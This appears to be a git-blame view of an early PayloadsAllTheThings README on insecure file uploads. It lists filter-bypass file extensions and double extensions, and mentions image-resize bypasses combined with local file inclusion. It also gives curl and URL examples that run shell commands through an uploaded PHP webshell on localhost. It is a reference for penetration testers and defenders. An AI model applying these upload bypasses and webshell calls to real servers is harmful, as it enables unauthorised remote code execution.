Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-11-10 15:14:34 +00:00
Code Issues Projects Releases Packages Wiki Activity
PayloadsAllTheThings/Upload insecure files/README.md

40 lines
909 B
Markdown
Raw Normal View History

Upload payloads
2016-10-18 11:13:23 +00:00
# Upload
Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.
## Exploits
Image Tragik
```
HTTP Request
Reverse Shell
Touch command
```
PHP Extension
```
.php
Less known extension
.pht
.pgif
.phtml
.shtml
Double extension
.jpeg.php
.png.php
```
PNG Bypass a resize - Upload the picture and use a local file inclusion
```
You can use it by specifying $_GET[0] as shell_exec and passing a $_POST[1] parameter with the shell command to execute.
curl 'http://localhost/b.php?0=shell_exec' --data "1='ls'"
curl 'http://localhost/test.php?0=system' --data "1='ls'"
```
Init directory with README
2016-10-18 08:01:56 +00:00
Upload payloads
2016-10-18 11:13:23 +00:00
JPG Bypass a resize - Upload the picture and use a local file inclusion
Init directory with README
2016-10-18 08:01:56 +00:00
```
Upload payloads
2016-10-18 11:13:23 +00:00
http://localhost/test.php?c=ls
Init directory with README
2016-10-18 08:01:56 +00:00
```
## Thanks to
Upload payloads
2016-10-18 11:13:23 +00:00
* Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil
Reference in a new issue Copy permalink